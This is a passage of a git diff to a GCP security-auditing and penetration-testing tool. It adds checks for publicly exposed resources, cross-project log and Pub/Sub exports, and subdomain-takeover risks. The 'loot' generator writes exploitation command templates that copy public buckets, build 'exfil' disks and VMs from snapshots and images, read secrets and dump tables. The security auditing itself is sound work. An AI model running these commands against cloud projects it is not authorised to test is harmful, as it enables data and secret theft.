func(page *notebooks.ListInstancesResponse) error { + for _, instance := range page.Instances { + // Get IAM policy for notebook instance + policy, err := nbService.Projects.Locations.Instances.GetIamPolicy(instance.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + location := publicAccessExtractLocation(instance.Name) + resource := PublicResource{ + ResourceType: "Notebook Instance", + ResourceName: publicAccessExtractResourceName(instance.Name), + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("State: %s, Machine: %s", instance.State, instance.MachineType), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list notebooks in project %s", projectID)) + } +} + +// checkSourceRepos checks Cloud Source Repositories for public access +func (m *PublicAccessModule) checkSourceRepos(ctx context.Context, projectID string, logger internal.Logger) { + srService, err := sourcerepo.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s", projectID) + req := srService.Projects.Repos.List(parent) + err = req.Pages(ctx, func(page *sourcerepo.ListReposResponse) error { + for _, repo := range page.Repos { + // Get IAM policy for repo + policy, err := srService.Projects.Repos.GetIamPolicy(repo.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + resource := PublicResource{ + ResourceType: "Source Repository", + ResourceName: publicAccessExtractResourceName(repo.Name), + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("URL: %s", repo.Url), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list source repos in project %s", projectID)) + } +} + +// addResource adds a public resource to the list thread-safely +func (m *PublicAccessModule) addResource(resource PublicResource) { + m.mu.Lock() + defer m.mu.Unlock() + m.PublicResources = append(m.PublicResources, resource) + m.addResourceToLoot(resource) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PublicAccessModule) initializeLootFiles() { + m.LootMap["public-access-commands"] = &internal.LootFile{ + Name: "public-access-commands", + Contents: "# Public Access Exploitation Commands\n# Generated by CloudFox\n# WARNING: These resources are publicly accessible!\n\n", + } +} + +func (m *PublicAccessModule) addResourceToLoot(resource PublicResource) { + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "## [%s] %s: %s (Project: %s)\n"+ + "# Access: %s\n"+ + "# Role: %s\n", + resource.AccessLevel, + resource.ResourceType, + resource.ResourceName, + resource.ProjectID, + resource.AccessLevel, + resource.Role, + ) + + // Add type-specific commands + switch resource.ResourceType { + case "Cloud Storage": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n"+ + "gsutil cp gs://%s/FILE ./\n\n", + resource.ResourceName, resource.ResourceName) + case "Compute Snapshot": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "gcloud compute disks create exfil-disk --source-snapshot=projects/%s/global/snapshots/%s --zone=us-central1-a\n\n", + resource.ProjectID, resource.ResourceName) + case "Compute Image": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "gcloud compute instances create exfil-vm --image=projects/%s/global/images/%s --zone=us-central1-a\n\n", + resource.ProjectID, resource.ResourceName) + case "BigQuery Dataset", "BigQuery Table": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s` LIMIT 100'\n\n", + resource.ProjectID, resource.ResourceName) + case "Cloud Run": + if strings.Contains(resource.AdditionalInfo, "URL:") { + url := strings.TrimPrefix(resource.AdditionalInfo, "URL: ") + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "curl -v %s\n\n", url) + } + case "Cloud Function": + if strings.Contains(resource.AdditionalInfo, "URL:") { + parts := strings.Split(resource.AdditionalInfo, ",") + if len(parts) > 0 { + url := strings.TrimPrefix(parts[0], "URL: ") + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "curl -v %s\n\n", url) + } + } + case "Pub/Sub Topic": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "gcloud pubsub topics publish %s --message='test' --project=%s\n\n", + resource.ResourceName, resource.ProjectID) + case "Pub/Sub Subscription": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "gcloud pubsub subscriptions pull %s --auto-ack --project=%s\n\n", + resource.ResourceName, resource.ProjectID) + case "Secret Manager": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "gcloud secrets versions access latest --secret=%s --project=%s\n\n", + resource.ResourceName, resource.ProjectID) + case "Artifact Registry": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n\n", + resource.Location, resource.ProjectID, resource.ResourceName) + case "Cloud KMS": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public KMS key access!\n"+ + "gcloud kms keys describe %s --keyring=KEYRING --location=%s --project=%s\n"+ + "# If encrypt role: can encrypt data with this key\n"+ + "# If decrypt role: can decrypt data encrypted with this key\n\n", + resource.ResourceName, resource.Location, resource.ProjectID) + case "Spanner Instance", "Spanner Database": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Spanner access!\n"+ + "gcloud spanner databases list --instance=%s --project=%s\n"+ + "gcloud spanner databases execute-sql DATABASE --instance=%s --sql='SELECT * FROM TableName LIMIT 10' --project=%s\n\n", + resource.ResourceName, resource.ProjectID, resource.ResourceName, resource.ProjectID) + case "Dataproc Cluster": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Dataproc cluster!\n"+ + "gcloud dataproc clusters describe %s --region=%s --project=%s\n"+ + "gcloud dataproc jobs list --cluster=%s --region=%s --project=%s\n\n", + resource.ResourceName, resource.Location, resource.ProjectID, + resource.ResourceName, resource.Location, resource.ProjectID) + case "Notebook Instance": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Notebook instance!\n"+ + "gcloud notebooks instances describe %s --location=%s --project=%s\n"+ + "# Get proxy URL to access notebook\n\n", + resource.ResourceName, resource.Location, resource.ProjectID) + case "Source Repository": + m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Source Repository!\n"+ + "gcloud source repos clone %s --project=%s\n"+ + "# Clone and examine source code\n\n", + resource.ResourceName, resource.ProjectID) + default: + m.LootMap["public-access-commands"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PublicAccessModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Project Name", + "Resource Type", + "Resource Name", + "Location", + "Access Level", + "Role", + "Size", + "Additional Info", + } + + var body [][]string + for _, r := range m.PublicResources { + location := r.Location + if location == "" { + location = "global" + } + size := r.Size + if size == "" { + size = "-" + } + + body = append(body, []string{ + r.ProjectID, + m.GetProjectName(r.ProjectID), + r.ResourceType, + r.ResourceName, + location, + r.AccessLevel, + r.Role, + size, + r.AdditionalInfo, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: These resources are publicly accessible!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{} + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-access", + Header: header, + Body: body, + }) + } + + output := PublicAccessOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBLICACCESS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ + +func publicAccessExtractResourceName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func publicAccessExtractLocation(fullName string) string { + // Format: projects/PROJECT/locations/LOCATION/... + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +func publicAccessFormatBytes(bytes int64) string { + if bytes == 0 { + return "-" + } + const unit = 1024 + if bytes < unit { + return fmt.Sprintf("%d B", bytes) + } + div, exp := int64(unit), 0 + for n := bytes / unit; n >= unit; n /= unit { + div *= unit + exp++ + } + return fmt.Sprintf("%.1f %cB", float64(bytes)/float64(div), "KMGTPE"[exp]) +} diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go index c9ad22f3..379c2a76 100644 --- a/gcp/services/composerService/composerService.go +++ b/gcp/services/composerService/composerService.go @@ -4,11 +4,34 @@ import ( "context" "fmt" "strings" + "sync" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" composer "google.golang.org/api/composer/v1" ) +// composerRegions contains all Cloud Composer regions +// Note: Cloud Composer API does NOT support the "-" wildcard for locations +// so we need to iterate through regions explicitly +var composerRegions = []string{ + // Americas + "northamerica-northeast1", "northamerica-northeast2", "northamerica-south1", + "southamerica-east1", "southamerica-west1", + "us-central1", "us-east1", "us-east4", "us-east5", "us-east7", + "us-south1", "us-west1", "us-west2", "us-west3", "us-west4", + // Europe + "europe-central2", "europe-north1", "europe-north2", + "europe-southwest1", "europe-west1", "europe-west2", "europe-west3", + "europe-west4", "europe-west6", "europe-west8", "europe-west9", + "europe-west10", "europe-west12", + // Asia Pacific + "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast2", "asia-northeast3", + "asia-south1", "asia-south2", "asia-southeast1", "asia-southeast2", + "australia-southeast1", "australia-southeast2", + // Middle East & Africa + "africa-south1", "me-central1", "me-central2", "me-west1", +} + type ComposerService struct { session *gcpinternal.SafeSession } @@ -51,7 +74,9 @@ type EnvironmentInfo struct { EnablePrivateEndpoint bool `json:"enablePrivateEndpoint"` } -// ListEnvironments retrieves all Composer environments in a project +// ListEnvironments retrieves all Composer environments in a project across all regions +// Note: The Cloud Composer API does NOT support the "-" wildcard for locations +// so we must iterate through regions explicitly func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, error) { ctx := context.Background() var service *composer.Service @@ -67,19 +92,51 @@ func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, } var environments []EnvironmentInfo + var mu sync.Mutex + var wg sync.WaitGroup + var lastErr error + var errMu sync.Mutex + + // Use a semaphore to limit concurrent API calls + semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + + // Iterate through all Composer regions in parallel + for _, region := range composerRegions { + wg.Add(1) + go func(region string) { + defer wg.Done() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, region) + req := service.Projects.Locations.Environments.List(parent) + err := req.Pages(ctx, func(page *composer.ListEnvironmentsResponse) error { + for _, env := range page.Environments { + info := s.parseEnvironment(env, projectID) + mu.Lock() + environments = append(environments, info) + mu.Unlock() + } + return nil + }) + + if err != nil { + // Track the last error but continue - region may not have environments or API may not be enabled + errMu.Lock() + lastErr = err + errMu.Unlock() + } + }(region) + } - // List environments across all locations - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - req := service.Projects.Locations.Environments.List(parent) - err = req.Pages(ctx, func(page *composer.ListEnvironmentsResponse) error { - for _, env := range page.Environments { - info := s.parseEnvironment(env, projectID) - environments = append(environments, info) - } - return nil - }) - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "composer.googleapis.com") + wg.Wait() + + // Only return error if we got no environments AND had errors + // If we found environments in some regions, that's success + if len(environments) == 0 && lastErr != nil { + return nil, gcpinternal.ParseGCPError(lastErr, "composer.googleapis.com") } return environments, nil diff --git a/gcp/services/crossProjectService/crossProjectService.go b/gcp/services/crossProjectService/crossProjectService.go index 104322ad..31f638c1 100644 --- a/gcp/services/crossProjectService/crossProjectService.go +++ b/gcp/services/crossProjectService/crossProjectService.go @@ -8,6 +8,8 @@ import ( gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" iam "google.golang.org/api/iam/v1" + logging "google.golang.org/api/logging/v2" + pubsub "google.golang.org/api/pubsub/v1" ) type CrossProjectService struct{} @@ -48,6 +50,31 @@ type LateralMovementPath struct { ExploitCommands []string `json:"exploitCommands"` } +// CrossProjectLoggingSink represents a logging sink exporting to another project +type CrossProjectLoggingSink struct { + SourceProject string `json:"sourceProject"` // Project where sink is configured + SinkName string `json:"sinkName"` // Name of the logging sink + Destination string `json:"destination"` // Full destination (bucket, BQ, pubsub, etc) + DestinationType string `json:"destinationType"` // storage, bigquery, pubsub, logging + TargetProject string `json:"targetProject"` // Project where data is sent + Filter string `json:"filter"` // Log filter + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` +} + +// CrossProjectPubSubExport represents a Pub/Sub subscription exporting to another project +type CrossProjectPubSubExport struct { + SourceProject string `json:"sourceProject"` // Project where subscription is + TopicProject string `json:"topicProject"` // Project where topic is + TopicName string `json:"topicName"` // Topic name + SubscriptionName string `json:"subscriptionName"` // Subscription name + ExportType string `json:"exportType"` // push, bigquery, cloudstorage + ExportDest string `json:"exportDest"` // Destination details + TargetProject string `json:"targetProject"` // Project where data is exported to + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + // AnalyzeCrossProjectAccess analyzes cross-project IAM bindings for a set of projects func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string) ([]CrossProjectBinding, error) { ctx := context.Background() @@ -422,3 +449,314 @@ func categorizePrivilegeLevel(role string) string { } return "READ" // Default to READ for unknown } + +// FindCrossProjectLoggingSinks discovers logging sinks that export to other projects +func (s *CrossProjectService) FindCrossProjectLoggingSinks(projectIDs []string) ([]CrossProjectLoggingSink, error) { + ctx := context.Background() + + loggingService, err := logging.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + // Build project lookup map + projectMap := make(map[string]bool) + for _, p := range projectIDs { + projectMap[p] = true + } + + var crossProjectSinks []CrossProjectLoggingSink + + for _, sourceProject := range projectIDs { + parent := fmt.Sprintf("projects/%s", sourceProject) + req := loggingService.Projects.Sinks.List(parent) + err := req.Pages(ctx, func(page *logging.ListSinksResponse) error { + for _, sink := range page.Sinks { + // Parse destination to extract target project + destType, targetProject := parseLoggingDestination(sink.Destination) + + // Check if this is a cross-project sink + if targetProject != "" && targetProject != sourceProject { + riskLevel, riskReasons := analyzeLoggingSinkRisk(sink, targetProject, projectMap) + + crossSink := CrossProjectLoggingSink{ + SourceProject: sourceProject, + SinkName: sink.Name, + Destination: sink.Destination, + DestinationType: destType, + TargetProject: targetProject, + Filter: sink.Filter, + RiskLevel: riskLevel, + RiskReasons: riskReasons, + } + crossProjectSinks = append(crossProjectSinks, crossSink) + } + } + return nil + }) + if err != nil { + // Continue with other projects + continue + } + } + + return crossProjectSinks, nil +} + +// parseLoggingDestination parses a logging sink destination to extract type and project +func parseLoggingDestination(destination string) (destType, projectID string) { + // Destination formats: + // storage.googleapis.com/BUCKET_NAME + // bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + // pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + // logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + + if strings.HasPrefix(destination, "storage.googleapis.com/") { + // GCS bucket - need to look up bucket to get project (not easily extractable) + return "storage", "" + } + + if strings.HasPrefix(destination, "bigquery.googleapis.com/") { + destType = "bigquery" + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + parts := strings.Split(destination, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return destType, parts[i+1] + } + } + } + + if strings.HasPrefix(destination, "pubsub.googleapis.com/") { + destType = "pubsub" + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + parts := strings.Split(destination, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return destType, parts[i+1] + } + } + } + + if strings.HasPrefix(destination, "logging.googleapis.com/") { + destType = "logging" + // Format: logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + parts := strings.Split(destination, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return destType, parts[i+1] + } + } + } + + return "unknown", "" +} + +// analyzeLoggingSinkRisk analyzes the risk level of a cross-project logging sink +func analyzeLoggingSinkRisk(sink *logging.LogSink, targetProject string, knownProjects map[string]bool) (string, []string) { + var reasons []string + score := 0 + + // External project is higher risk + if !knownProjects[targetProject] { + reasons = append(reasons, "Logs exported to project outside analyzed scope") + score += 2 + } + + // Check if filter is broad (empty = all logs) + if sink.Filter == "" { + reasons = append(reasons, "No filter - ALL logs exported") + score += 2 + } + + // Check for sensitive log types in filter + sensitiveLogTypes := []string{"data_access", "admin_activity", "cloudaudit"} + for _, lt := range sensitiveLogTypes { + if strings.Contains(sink.Filter, lt) { + reasons = append(reasons, fmt.Sprintf("Exports sensitive logs: %s", lt)) + score += 1 + } + } + + // Check if sink has service account (writerIdentity) + if sink.WriterIdentity != "" { + reasons = append(reasons, fmt.Sprintf("Service account: %s", sink.WriterIdentity)) + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } + return "LOW", reasons +} + +// FindCrossProjectPubSubExports discovers Pub/Sub subscriptions that export to other projects +func (s *CrossProjectService) FindCrossProjectPubSubExports(projectIDs []string) ([]CrossProjectPubSubExport, error) { + ctx := context.Background() + + pubsubService, err := pubsub.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + // Build project lookup map + projectMap := make(map[string]bool) + for _, p := range projectIDs { + projectMap[p] = true + } + + var crossProjectExports []CrossProjectPubSubExport + + for _, sourceProject := range projectIDs { + // List all subscriptions in project + parent := fmt.Sprintf("projects/%s", sourceProject) + req := pubsubService.Projects.Subscriptions.List(parent) + err := req.Pages(ctx, func(page *pubsub.ListSubscriptionsResponse) error { + for _, sub := range page.Subscriptions { + // Extract subscription name and topic project + subName := extractResourceNameFromPath(sub.Name) + topicProject := extractProjectFromPath(sub.Topic) + + var exportType, exportDest, targetProject string + + // Check for BigQuery export + if sub.BigqueryConfig != nil && sub.BigqueryConfig.Table != "" { + exportType = "bigquery" + exportDest = sub.BigqueryConfig.Table + // Extract project from table: PROJECT:DATASET.TABLE + if parts := strings.Split(sub.BigqueryConfig.Table, ":"); len(parts) > 0 { + targetProject = parts[0] + } + } + + // Check for Cloud Storage export + if sub.CloudStorageConfig != nil && sub.CloudStorageConfig.Bucket != "" { + exportType = "cloudstorage" + exportDest = sub.CloudStorageConfig.Bucket + // Bucket project not easily extractable without additional API call + targetProject = "" + } + + // Check for push endpoint + if sub.PushConfig != nil && sub.PushConfig.PushEndpoint != "" { + exportType = "push" + exportDest = sub.PushConfig.PushEndpoint + // External push endpoints can't be mapped to a project + targetProject = "external" + } + + // Check if subscription is to a topic in another project + if topicProject != "" && topicProject != sourceProject { + // This is a cross-project topic subscription + riskLevel, riskReasons := analyzePubSubExportRisk(sub, targetProject, projectMap, topicProject, sourceProject) + export := CrossProjectPubSubExport{ + SourceProject: sourceProject, + TopicProject: topicProject, + TopicName: extractResourceNameFromPath(sub.Topic), + SubscriptionName: subName, + ExportType: "cross-project-topic", + ExportDest: sub.Topic, + TargetProject: topicProject, + RiskLevel: riskLevel, + RiskReasons: riskReasons, + } + crossProjectExports = append(crossProjectExports, export) + } + + // If exporting to another project via BQ/GCS + if targetProject != "" && targetProject != sourceProject && targetProject != "external" { + riskLevel, riskReasons := analyzePubSubExportRisk(sub, targetProject, projectMap, topicProject, sourceProject) + export := CrossProjectPubSubExport{ + SourceProject: sourceProject, + TopicProject: topicProject, + TopicName: extractResourceNameFromPath(sub.Topic), + SubscriptionName: subName, + ExportType: exportType, + ExportDest: exportDest, + TargetProject: targetProject, + RiskLevel: riskLevel, + RiskReasons: riskReasons, + } + crossProjectExports = append(crossProjectExports, export) + } + } + return nil + }) + if err != nil { + // Continue with other projects + continue + } + } + + return crossProjectExports, nil +} + +// extractResourceNameFromPath extracts the resource name from a full path +func extractResourceNameFromPath(path string) string { + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} + +// extractProjectFromPath extracts the project ID from a resource path +func extractProjectFromPath(path string) string { + // Format: projects/PROJECT_ID/... + parts := strings.Split(path, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +// analyzePubSubExportRisk analyzes the risk level of a cross-project Pub/Sub export +func analyzePubSubExportRisk(sub *pubsub.Subscription, targetProject string, knownProjects map[string]bool, topicProject, sourceProject string) (string, []string) { + var reasons []string + score := 0 + + // External target project is higher risk + if targetProject != "" && !knownProjects[targetProject] { + reasons = append(reasons, "Data exported to project outside analyzed scope") + score += 2 + } + + // Cross-project topic subscription + if topicProject != "" && topicProject != sourceProject { + reasons = append(reasons, fmt.Sprintf("Subscription to topic in project %s", topicProject)) + score += 1 + } + + // Push to external endpoint + if sub.PushConfig != nil && sub.PushConfig.PushEndpoint != "" { + endpoint := sub.PushConfig.PushEndpoint + reasons = append(reasons, fmt.Sprintf("Push endpoint: %s", endpoint)) + // External endpoints are high risk + if !strings.Contains(endpoint, ".run.app") && !strings.Contains(endpoint, ".cloudfunctions.net") { + reasons = append(reasons, "Push to external (non-GCP) endpoint") + score += 2 + } + } + + // BigQuery export + if sub.BigqueryConfig != nil { + reasons = append(reasons, fmt.Sprintf("BigQuery export: %s", sub.BigqueryConfig.Table)) + score += 1 + } + + // Cloud Storage export + if sub.CloudStorageConfig != nil { + reasons = append(reasons, fmt.Sprintf("Cloud Storage export: %s", sub.CloudStorageConfig.Bucket)) + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } + return "LOW", reasons +} diff --git a/gcp/services/dnsService/dnsService.go b/gcp/services/dnsService/dnsService.go index ae898fe2..10216161 100644 --- a/gcp/services/dnsService/dnsService.go +++ b/gcp/services/dnsService/dnsService.go @@ -2,6 +2,7 @@ package dnsservice import ( "context" + "fmt" "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -60,6 +61,89 @@ type RecordInfo struct { RRDatas []string // Record data } +// TakeoverRisk represents a potential subdomain takeover vulnerability +type TakeoverRisk struct { + RecordName string + RecordType string + Target string + Service string // AWS S3, Azure, GitHub Pages, etc. + RiskLevel string // HIGH, MEDIUM, LOW + Description string + Verification string // How to verify the takeover +} + +// takeoverPatterns maps CNAME/A record patterns to potential takeover services +var takeoverPatterns = map[string]struct { + Service string + RiskLevel string + Description string +}{ + // AWS + ".s3.amazonaws.com": {"AWS S3", "HIGH", "S3 bucket may be unclaimed - check for 'NoSuchBucket' error"}, + ".s3-website": {"AWS S3 Website", "HIGH", "S3 website bucket may be unclaimed"}, + ".elasticbeanstalk.com": {"AWS Elastic Beanstalk", "HIGH", "Elastic Beanstalk environment may be deleted"}, + ".cloudfront.net": {"AWS CloudFront", "MEDIUM", "CloudFront distribution may be unconfigured"}, + // Azure + ".azurewebsites.net": {"Azure App Service", "HIGH", "Azure web app may be deleted"}, + ".cloudapp.azure.com": {"Azure Cloud App", "HIGH", "Azure cloud app may be deleted"}, + ".cloudapp.net": {"Azure Cloud Service", "HIGH", "Azure cloud service may be deleted"}, + ".blob.core.windows.net": {"Azure Blob Storage", "HIGH", "Azure blob container may be deleted"}, + ".azure-api.net": {"Azure API Management", "MEDIUM", "Azure API may be deleted"}, + ".azureedge.net": {"Azure CDN", "MEDIUM", "Azure CDN endpoint may be deleted"}, + ".trafficmanager.net": {"Azure Traffic Manager", "HIGH", "Traffic Manager profile may be deleted"}, + // Google Cloud + ".storage.googleapis.com": {"GCP Cloud Storage", "HIGH", "GCS bucket may be deleted"}, + ".appspot.com": {"GCP App Engine", "MEDIUM", "App Engine app may be deleted"}, + ".run.app": {"GCP Cloud Run", "LOW", "Cloud Run service (usually protected)"}, + ".cloudfunctions.net": {"GCP Cloud Functions", "LOW", "Cloud Function (usually protected)"}, + // GitHub + ".github.io": {"GitHub Pages", "HIGH", "GitHub Pages repo may be deleted"}, + ".githubusercontent.com": {"GitHub", "MEDIUM", "GitHub resource may be deleted"}, + // Heroku + ".herokuapp.com": {"Heroku", "HIGH", "Heroku app may be deleted"}, + ".herokudns.com": {"Heroku DNS", "HIGH", "Heroku DNS may be unconfigured"}, + // Other services + ".pantheonsite.io": {"Pantheon", "HIGH", "Pantheon site may be deleted"}, + ".netlify.app": {"Netlify", "MEDIUM", "Netlify site may be deleted"}, + ".netlify.com": {"Netlify", "MEDIUM", "Netlify site may be deleted"}, + ".vercel.app": {"Vercel", "MEDIUM", "Vercel deployment may be deleted"}, + ".now.sh": {"Vercel (Now)", "MEDIUM", "Vercel deployment may be deleted"}, + ".surge.sh": {"Surge.sh", "HIGH", "Surge project may be deleted"}, + ".bitbucket.io": {"Bitbucket", "HIGH", "Bitbucket repo may be deleted"}, + ".ghost.io": {"Ghost", "HIGH", "Ghost blog may be deleted"}, + ".helpjuice.com": {"Helpjuice", "HIGH", "Helpjuice site may be deleted"}, + ".helpscoutdocs.com": {"HelpScout", "HIGH", "HelpScout docs may be deleted"}, + ".zendesk.com": {"Zendesk", "MEDIUM", "Zendesk may be unconfigured"}, + ".teamwork.com": {"Teamwork", "HIGH", "Teamwork site may be deleted"}, + ".cargocollective.com": {"Cargo", "HIGH", "Cargo site may be deleted"}, + ".feedpress.me": {"Feedpress", "HIGH", "Feedpress feed may be deleted"}, + ".freshdesk.com": {"Freshdesk", "MEDIUM", "Freshdesk may be unconfigured"}, + ".readme.io": {"ReadMe", "HIGH", "ReadMe docs may be deleted"}, + ".statuspage.io": {"Statuspage", "HIGH", "Statuspage may be deleted"}, + ".smugmug.com": {"SmugMug", "HIGH", "SmugMug may be deleted"}, + ".strikingly.com": {"Strikingly", "HIGH", "Strikingly site may be deleted"}, + ".tilda.ws": {"Tilda", "HIGH", "Tilda site may be deleted"}, + ".tumblr.com": {"Tumblr", "HIGH", "Tumblr blog may be deleted"}, + ".unbounce.com": {"Unbounce", "HIGH", "Unbounce page may be deleted"}, + ".webflow.io": {"Webflow", "HIGH", "Webflow site may be deleted"}, + ".wordpress.com": {"WordPress.com", "MEDIUM", "WordPress site may be deleted"}, + ".wpengine.com": {"WP Engine", "HIGH", "WP Engine site may be deleted"}, + ".desk.com": {"Desk.com", "HIGH", "Desk.com may be deleted"}, + ".myshopify.com": {"Shopify", "HIGH", "Shopify store may be deleted"}, + ".launchrock.com": {"LaunchRock", "HIGH", "LaunchRock page may be deleted"}, + ".pingdom.com": {"Pingdom", "MEDIUM", "Pingdom may be unconfigured"}, + ".tictail.com": {"Tictail", "HIGH", "Tictail store may be deleted"}, + ".campaignmonitor.com": {"Campaign Monitor", "HIGH", "Campaign Monitor may be deleted"}, + ".canny.io": {"Canny", "HIGH", "Canny may be deleted"}, + ".getresponse.com": {"GetResponse", "HIGH", "GetResponse may be deleted"}, + ".airee.ru": {"Airee", "HIGH", "Airee may be deleted"}, + ".thinkific.com": {"Thinkific", "HIGH", "Thinkific may be deleted"}, + ".agilecrm.com": {"Agile CRM", "HIGH", "Agile CRM may be deleted"}, + ".aha.io": {"Aha!", "HIGH", "Aha! may be deleted"}, + ".animaapp.io": {"Anima", "HIGH", "Anima may be deleted"}, + ".proposify.com": {"Proposify", "HIGH", "Proposify may be deleted"}, +} + // Zones retrieves all DNS managed zones in a project func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { ctx := context.Background() @@ -184,6 +268,60 @@ func extractNetworkName(networkURL string) string { return networkURL } +// CheckTakeoverRisks analyzes DNS records for potential subdomain takeover vulnerabilities +func (ds *DNSService) CheckTakeoverRisks(records []RecordInfo) []TakeoverRisk { + var risks []TakeoverRisk + + for _, record := range records { + // Only check CNAME records (primary takeover vector) + if record.Type != "CNAME" { + continue + } + + for _, target := range record.RRDatas { + targetLower := strings.ToLower(target) + + // Check against known vulnerable patterns + for pattern, info := range takeoverPatterns { + if strings.Contains(targetLower, pattern) { + risk := TakeoverRisk{ + RecordName: record.Name, + RecordType: record.Type, + Target: target, + Service: info.Service, + RiskLevel: info.RiskLevel, + Description: info.Description, + Verification: generateVerificationCommand(record.Name, target, info.Service), + } + risks = append(risks, risk) + break // Only match first pattern + } + } + } + } + + return risks +} + +// generateVerificationCommand creates a command to verify if takeover is possible +func generateVerificationCommand(recordName, target, service string) string { + // Remove trailing dot from DNS names + name := strings.TrimSuffix(recordName, ".") + + switch { + case strings.Contains(service, "S3"): + return fmt.Sprintf("curl -sI http://%s | head -5 # Look for 'NoSuchBucket'", name) + case strings.Contains(service, "Azure"): + return fmt.Sprintf("curl -sI https://%s | head -5 # Look for 'NXDOMAIN' or error page", name) + case strings.Contains(service, "GitHub"): + return fmt.Sprintf("curl -sI https://%s | head -5 # Look for '404' or 'no GitHub Pages'", name) + case strings.Contains(service, "Heroku"): + return fmt.Sprintf("curl -sI https://%s | head -5 # Look for 'no such app'", name) + default: + return fmt.Sprintf("dig %s && curl -sI https://%s | head 